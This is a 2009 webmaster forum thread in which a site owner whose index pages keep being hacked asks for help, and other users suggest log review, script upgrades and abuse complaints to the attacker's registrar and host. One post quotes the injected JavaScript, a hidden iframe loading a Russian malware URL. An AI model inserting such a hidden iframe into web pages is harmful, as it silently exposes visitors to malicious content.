Pages: 1
| Posted: 12 May 2009 23:22 | ||
|
Registered User Currently Offline |
Posts: 32 Join Date: Jul 2005 |
|
Has there been any indication that a hacker could go through the seo board and plant a bad javascript or iframe to non message board pages?
I keep getting hacked every 3 hours. I take the code off and he puts it back on my index pages. The stupid bluehost webhost will not help me. They just tell me to look at all my scripts. They are pretty worthless by the way, but I don't know of any other webhost that is any better and would give me enough web space and bandwidth. I've changed my password 4 times already. Any help advice would be helpful. I really doubt the hacker is using the seo board because I've used it for years with no problems, but I'm desperate. Got to check every possibility. __________________ web tips at Webmaster Tips or talk about television at TVcrazy.net TV Board
|
||
| Posted: 13 May 2009 08:19 Last Edited By: Hristo | ||
|
Administrator |
Posts: 1104 Join Date: Mar 2005 |
|
|
Look at your logs for strange calls to scripts. Also, what version is your seo-board? What other scripts do you have?
Sometimes, it is not even a hacker, but a hack bot that tries known vulnerabilities in scripts on site after site. Upgrade all your scripts if you can't spot the hole. |
||
| Posted: 13 May 2009 12:46 | ||
|
Registered User Currently Offline |
Posts: 15 Join Date: Apr 2009 |
|
| I know what it is. It is a shell. msn me: phyrrus@live.com | ||
| Posted: 13 May 2009 15:17 | ||
|
|
Registered User Currently Offline |
Posts: 32 Join Date: Jul 2005 |
|
I looked at my logs, it's hard to tell anything, there's so many lines on it. I did see on my stats a russian ip with a lot of hits. I banned it. No good though.
This is what the script looks like that they put on your site after you run a binary translation Quote:
window.status='Done';document.write('<iframe name=4749f56 src=\'http://zctk.ru/liwe/?t=1?'+Math.round(Math.random()*155800)+'4646f11\' width=475 height=328 style=\'display: none\'></iframe>') version is latest I believe 1.1 As far as a shell I have no idea. I've deleted all scripts for today, if it gets back on there again, I guess I'll move it to another spot. You reckon that would work? All my other sites that are on that account seem to working normally. Nothing added. Very strange. Although last week somebody ordered junk from godaddy in my name. Godaddy caught it. And somebody changed my password on another account I had with bluehost. After I changed it again. Nothing else happened there. __________________ web tips at Webmaster Tips or talk about television at TVcrazy.net TV Board
|
||
| Posted: 14 May 2009 08:35 Last Edited By: touch | ||
|
Registered User Currently Offline |
Posts: 17 Join Date: Jan 2008 |
|
|
I suggest to contact their registrar (Regtime Ltd) abuse department here:
Quote:
nic-hdl: REGTIME-REG-RIPN org: Regtime Ltd phone: +7 846 9799038 fax-no: +7 846 9799039 e-mail: support@regtime.net www: http://www.webnames.ru whois: whois.regtime.net source: TC-RIPN According to tracert these guys provides hosting for ZCTK.RU Quote:
http://internet-spb.ru/new/?modules=static&page=contacts director@internet-spb.ru ingeneer@internet-spb.ru admin@internet-spb.ru hr@internet-spb.ru They also use the dns services provided by third party. You should send your complaints there as well. __________________ |
||
| Posted: 14 May 2009 13:25 | ||
|
Registered User Currently Offline |
Posts: 15 Join Date: Apr 2009 |
|
| It is good now. that i frame script was the code portion of the shell. c&d his ISP and the shell will go away. | ||
Pages: 1
Powered by SEO-Board 1.1.0, 
RSS 2.0 Atom 1.0
Copyright © 2005-2010 Hristo Hristov, Author of SEO-Board and Fitness Assistant
RSS 2.0 Atom 1.0